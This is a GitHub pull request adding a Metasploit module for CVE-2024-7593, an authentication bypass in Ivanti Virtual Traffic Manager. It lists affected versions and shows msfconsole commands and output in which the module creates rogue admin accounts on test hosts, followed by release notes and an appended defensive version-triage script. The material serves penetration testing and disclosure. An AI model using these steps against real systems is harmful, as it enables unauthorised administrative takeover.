Ivanti Virtual Traffic Manager (vTM) Authentication Bypass (CVE-2024-7593) Module #19386

Merged
merged 7 commits into from
Aug 27, 2024


h4x-x0r
Contributor

@h4x-x0r h4x-x0r commented Aug 14, 2024

This is a new module which exploits an improper access control vulnerability (CVE-2024-7593) in Ivanti Virtual Traffic Manager (vTM). It allows an unauthenticated remote attacker to add a new administrative user to the web interface of the product.

Affected versions include:

  • 22.2
  • 22.3
  • 22.3R2
  • 22.5R1
  • 22.6R1
  • 22.7R1

Verification Steps

  1. Docker images are available from here
  2. Start msfconsole
  3. use auxiliary/admin/http/ivanti_vtm_admin
  4. set RHOSTS <IP>
  5. run

A new administrative user should have been added to the web interface of the product.

msf6 > use auxiliary/admin/http/ivanti_vtm_admin 
msf6 auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit 
[*] Running module against 172.17.0.2

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 22.7R1
[+] New admin user was successfully added:
	h4x0r:w00Tw00T!
[+] Login at: https://172.17.0.2:9090/apps/zxtm/login.cgi
[*] Auxiliary module execution completed

Successfully tested on

  • 22.7R1 on Ubuntu 20.04.6 LTS

Auth Bypass
@h4x-x0r h4x-x0r marked this pull request as draft August 14, 2024 01:02
added error handling, documentation, version check, store_valid_credential
@h4x-x0r h4x-x0r changed the title from "Ivanti Virtual Traffic Manager (VTM) Authentication Bypass" to "Ivanti Virtual Traffic Manager (VTM) Authentication Bypass (CVE-2024-7593) Module" Aug 14, 2024
references, affected versions, credits
@h4x-x0r h4x-x0r changed the title from "Ivanti Virtual Traffic Manager (VTM) Authentication Bypass (CVE-2024-7593) Module" to "Ivanti Virtual Traffic Manager (vTM) Authentication Bypass (CVE-2024-7593) Module" Aug 14, 2024
Verified exploit against more affected versions
@h4x-x0r
Contributor Author

h4x-x0r commented Aug 14, 2024

Successfully verified the MSF module against more affected versions:

  • 22.7R1 on Ubuntu 20.04.6 LTS
  • 22.6R1 on Ubuntu 20.04.6 LTS
  • 22.5R1 on Ubuntu 20.04.6 LTS
  • 22.3R1 on Ubuntu 20.04.5 LTS
  • 22.2 on Ubuntu 20.04.4 LTS

@h4x-x0r h4x-x0r marked this pull request as ready for review August 14, 2024 05:55
Improved error handling
@grantwillcoxh3ai

grantwillcoxh3ai commented Aug 14, 2024

Woops looks like my suggestion broke the linter. Seems this is the issue:

Do not read Set-Cookie header directly, use res.get_cookies instead: if res && res.code == 302 && res.headers.key?('Set-Cookie') && res.headers['Set-Cookie'].include?('ZeusTMZAUTH_') 

I imagine this is the correct line then:

if res && res.code == 302 && res.get_cookies.include?('ZeusTMZAUTH_') 

Fixed get_cookies
code cleanup
@bwatters-r7 bwatters-r7 self-assigned this Aug 27, 2024
@bwatters-r7
Contributor

msf6 auxiliary(admin/http/ivanti_vtm_admin) > show options

Module options (auxiliary/admin/http/ivanti_vtm_admin):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   NEW_PASSWORD  ScJMvJLqFdvx     yes       Password to be used when creating a new user with admin privileges
   NEW_USERNAME  karri            yes       Username to be used when creating a new user with admin privileges
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           True             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       Base path
   VHOST                          no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/ivanti_vtm_admin) > set rhost 10.5.134.153
rhost => 10.5.134.153
msf6 auxiliary(admin/http/ivanti_vtm_admin) > check

[*] 10.5.134.153:9090 - The target appears to be vulnerable. Version: 22.7R1
msf6 auxiliary(admin/http/ivanti_vtm_admin) > run
[*] Running module against 10.5.134.153

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version: 22.7R1
[+] The target appears to be vulnerable. Version: 22.7R1
[*] Request to add new admin user sent, verifying...
[+] New admin user was successfully added:
	karri:ScJMvJLqFdvx
[+] Login at: https://10.5.134.153:9090/apps/zxtm/login.cgi
[*] Auxiliary module execution completed

@bwatters-r7 bwatters-r7 merged commit 4af2294 into rapid7:master Aug 27, 2024
37 of 39 checks passed
@bwatters-r7 bwatters-r7 added the rn-modules (release notes for new or majorly enhanced modules) and module labels Aug 27, 2024
@bwatters-r7
Contributor

bwatters-r7 commented Aug 27, 2024

Release Notes

Adds an exploit targeting CVE-2024-7593, an improper access control vulnerability in Ivanti Virtual Traffic Manager (vTM). It allows an unauthenticated remote attacker to add a new administrative user to the web interface of the product before 22.7R2.
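
For defenders checking exposure, the version information in this thread (the affected list, the additionally verified 22.3R1, and the "before 22.7R2" wording in the release notes) can be turned into an inventory triage. The Ruby below is an added example, not part of the PR or the Metasploit module; the hostnames and inventory are constructed, and sorting a version without an `R` suffix as revision 0 is an assumption.

```ruby
# Added example (not code from the PR): triage vTM version strings against
# the versions named in this thread.

# Versions listed as affected in the PR description, plus 22.3R1, which the
# follow-up comment reports as successfully verified.
NAMED_AFFECTED = %w[22.2 22.3 22.3R1 22.3R2 22.5R1 22.6R1 22.7R1].freeze
# The release notes describe the issue as present "before 22.7R2".
FIXED_IN = '22.7R2'

# Parse "22.7R1" into [22, 7, 1]. Assumption: a string with no "R" suffix
# (e.g. "22.2") sorts as revision 0 of that branch.
def parse_vtm_version(str)
  m = /\A(\d+)\.(\d+)(?:R(\d+))?\z/i.match(str.to_s.strip)
  return nil unless m

  [m[1].to_i, m[2].to_i, (m[3] || 0).to_i]
end

# Returns :named_affected, :at_or_after_fix, :unlisted_before_fix or
# :unparseable. :unlisted_before_fix means the thread does not name the
# version; confirm it against the vendor advisory before closing it out.
def triage_vtm_version(str)
  parsed = parse_vtm_version(str)
  return :unparseable if parsed.nil?
  return :named_affected if NAMED_AFFECTED.any? { |v| parse_vtm_version(v) == parsed }

  (parsed <=> parse_vtm_version(FIXED_IN)) >= 0 ? :at_or_after_fix : :unlisted_before_fix
end

# Constructed inventory: hostname => version string from an asset database.
SAMPLE_INVENTORY = {
  'vtm-lab-01' => '22.7R1',
  'vtm-lab-02' => '22.7R2',
  'vtm-lab-03' => '22.3r2',
  'vtm-lab-04' => '22.4R1',
  'vtm-lab-05' => 'unknown'
}.freeze

def triage_inventory(inventory)
  inventory.transform_values { |v| triage_vtm_version(v) }
end

if __FILE__ == $PROGRAM_NAME
  triage_inventory(SAMPLE_INVENTORY).each { |host, status| puts "#{host}\t#{status}" }
end
```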
